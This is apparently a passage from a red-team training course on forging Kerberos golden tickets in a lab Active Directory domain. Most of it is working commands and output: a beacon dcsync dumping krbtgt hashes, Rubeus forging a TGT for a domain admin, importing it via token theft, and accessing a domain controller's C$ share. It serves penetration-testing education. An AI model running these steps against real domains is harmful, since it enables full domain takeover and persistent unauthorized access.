A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. Where a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain; and to add insult to injury - the underlying credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).
Copy beacon> dcsync dev.cyberbotic.io DEV\krbtgt
* Primary:Kerberos-Newer-Keys *
Default Salt : DEV.CYBERBOTIC.IOkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
des_cbc_md5 (4096) : 629189372a372fda
Copy PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
[*] Action: Build TGT
[*] Building PAC
[*] Domain : DEV.CYBERBOTIC.IO (DEV)
[*] SID : S-1-5-21-569305411-121244042-2357301523
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dev.cyberbotic.io
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'nlamb@dev.cyberbotic.io'
[*] AuthTime : 9/9/2022 11:16:23 AM
[*] StartTime : 9/9/2022 11:16:23 AM
[*] EndTime : 9/9/2022 9:16:23 PM
[*] RenewTill : 9/16/2022 11:16:23 AM
[*] base64(ticket.kirbi):
doIFLz[...]MuaW8=
Copy beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5060
[+] Ticket successfully imported!
[+] LUID : 0x449047
beacon> steal_token 5060
beacon> run klist
#0> Client: nlamb @ DEV.CYBERBOTIC.IO
Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
beacon> ls \\dc-2.dev.cyberbotic.io\c$
[*] Listing: \\dc-2.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:44:08 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 16:09:55 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 10:51:51 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/05/2022 17:17:48 ProgramData
dir 08/15/2022 15:23:23 Recovery
dir 08/16/2022 12:37:38 Shares
dir 09/05/2022 12:03:43 System Volume Information
dir 08/15/2022 15:24:39 Users
dir 09/06/2022 15:21:25 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req
12kb fil 09/05/2022 07:25:58 DumpStack.log
12kb fil 09/09/2022 09:36:12 DumpStack.log.tmp
384mb fil 09/09/2022 09:36:12 pagefile.sys